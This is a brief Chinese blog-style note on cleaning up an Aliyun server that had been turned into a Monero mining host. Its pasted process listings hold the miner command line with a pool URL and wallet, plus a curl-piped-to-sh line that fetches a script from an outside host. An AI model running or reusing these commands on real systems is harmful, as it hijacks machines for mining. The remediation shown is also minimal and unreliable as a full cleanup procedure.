一台不太用阿里云服务器被运营报告连不上。putty登录查看发现全是一个叫yam的进程。
上网查了一下,可能是被做成挖矿机了。
先查看进程
ps aux |grep yam
结果如下
root 670 0.9 1.8 188648 18456 ? Sl Nov22 212:41 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr root 904 0.9 2.0 188648 20556 ? Sl Nov22 212:20 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr root 1462 0.9 2.0 188648 20396 ? Sl Nov22 211:58 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr root 1976 0.9 1.4 188648 14464 ? Sl Nov22 211:35 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr root 2520 0.9 0.6 188648 6640 ? Sl Nov22 211:08 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
....
先把进程杀掉
killall -9 yam
再查看所有进程
ps aut
root 28658 0.0 0.0 4064 76 ? Ss+ Nov23 0:00 /sbin/mingetty /dev/tty1 root 28659 0.0 0.0 4064 76 ? Ss+ Nov23 0:00 /sbin/mingetty /dev/tty2 root 28660 0.0 0.0 4064 72 ? Ss+ Nov23 0:00 /sbin/mingetty /dev/tty3 root 28661 0.0 0.0 4064 72 ? Ss+ Nov23 0:00 /sbin/mingetty /dev/tty4 root 28662 0.0 0.0 4064 76 ? Ss+ Nov23 0:00 /sbin/mingetty /dev/tty5 root 28808 0.0 0.0 4064 76 ? Ss+ Nov23 0:00 /sbin/mingetty /dev/tty6 root 29794 0.0 0.0 106092 148 ? Ss Nov21 0:00 /bin/sh -c curl -fsSL http://www.haveabitchin.com/pm.sh?1118 | sh root 29797 0.0 0.0 106096 156 ? S Nov21 0:00 sh root 29915 0.0 0.4 208564 4596 ? Sl Nov21 1:57 /tmp/duckduckgo
发现这一段明显是劫持过程。
然后把这些文件全部删除。
完毕。